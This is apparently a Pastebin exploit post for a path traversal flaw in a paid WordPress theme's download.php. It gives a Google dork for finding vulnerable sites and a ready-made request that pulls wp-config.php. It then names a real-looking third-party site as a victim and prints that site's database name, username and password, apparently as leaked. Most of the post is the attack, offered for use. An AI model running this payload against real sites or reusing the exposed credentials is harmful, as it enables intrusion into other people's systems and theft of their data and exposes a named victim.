KingSkrupellos

WordPress 4.2.2 Oxygen-Theme Themes DB Config File Download

Mar 19th, 2019
102
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.67 KB | None | 0 0
  1. ############################################################################################
  2.  
  3. # Exploit Title : WordPress 4.2.2 Oxygen-Theme Themes Database Configuration File Download
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 20/03/2019
  7. # Vendor Homepage : themeforest.net
  8. # Software Information Link : themeforest.net/item/oxygen-woocommerce-wordpress-theme/7851484
  9. # Software Affected Version : 4.x.x - 4.2.2
  10. # Software Price Type : Paid Download - 60$
  11. # Solution : Update to 5.0.x version
  12. # Tested On : Windows and Linux
  13. # Category : WebApps
  14. # Exploit Risk : Medium
  15. # Google Dorks : inurl:/wp-content/themes/oxygen-theme/
  16. # Vulnerability Type :
  17. CWE-16 [ Configuration ]
  18. CWE-200 [ Information Exposure ]
  19. CWE-23 [ Relative Path Traversal ]
  20. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  21. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  22. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  23.  
  24. ############################################################################################
  25.  
  26. # Impact :
  27. ***********
  28. * WordPress 4.2.2 Oxygen-Theme Themes is prone to a vulnerability that lets attackers download database config file because
  29.  
  30. the application fails to sufficiently sanitize user-supplied input. An attacker can exploit this issue to download arbitrary files
  31.  
  32. within the context of the web server process and obtain potentially sensitive informations.
  33.  
  34. * An information exposure is the intentional or unintentional disclosure of information to an actor that is not explicitly authorized
  35.  
  36. to have access to that information. * The software has Relative Path Traversal vulnerability and it uses external input to construct
  37.  
  38. a pathname that should be within a restricted directory, but it does not properly neutralize sequences such as ".." that can resolve
  39.  
  40. to a location that is outside of that directory.
  41.  
  42. ############################################################################################
  43.  
  44. # Vulnerable File :
  45. ****************
  46. /download.php
  47.  
  48. # Vulnerable Parameter :
  49. **********************
  50. ?file=
  51.  
  52. # Database Configuration File Download Exploit :
  53. ********************************************
  54. /wp-content/themes/oxygen-theme/download.php?file=../../../wp-config.php
  55.  
  56. Informations About MySQL Database Configuration File =>
  57. ****************************************************
  58. ** The name of the database for WordPress */
  59. define('DB_NAME', '');
  60.  
  61. /** MySQL database username */
  62. define('DB_USER', '');
  63.  
  64. /** MySQL database password */
  65. define('DB_PASSWORD', '');
  66.  
  67. /** MySQL hostname */
  68. define('DB_HOST', '');
  69.  
  70. ############################################################################################
  71.  
  72. # Example Vulnerable Sites :
  73. *************************
  74. [+] klimatrol.com/wp-content/themes/oxygen-theme/download.php?file=../../../wp-config.php
  75.  
  76. // ** MySQL settings - You can get this info from your web host ** //
  77. /
  78. ** The name of the database for WordPress */
  79. define('DB_NAME', 'klimatro_wrdp1');
  80.  
  81. /** MySQL database username */
  82. define('DB_USER', 'klimatro_wrdp1');
  83.  
  84. /** MySQL database password */
  85. define('DB_PASSWORD', 'Ijye1KJY6{BN');
  86.  
  87. /** MySQL hostname */
  88. define('DB_HOST', 'localhost');
  89.  
  90. /** Database Charset to use in creating database tables. */
  91. define('DB_CHARSET', 'utf8');
  92.  
  93. /** The Database Collate type. Don't change this if in doubt. */
  94. define('DB_COLLATE', '');
  95.  
  96. /**#@+
  97.  
  98. ############################################################################################
  99.  
  100. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  101.  
  102. ############################################################################################
Add Comment
Please, Sign In to add comment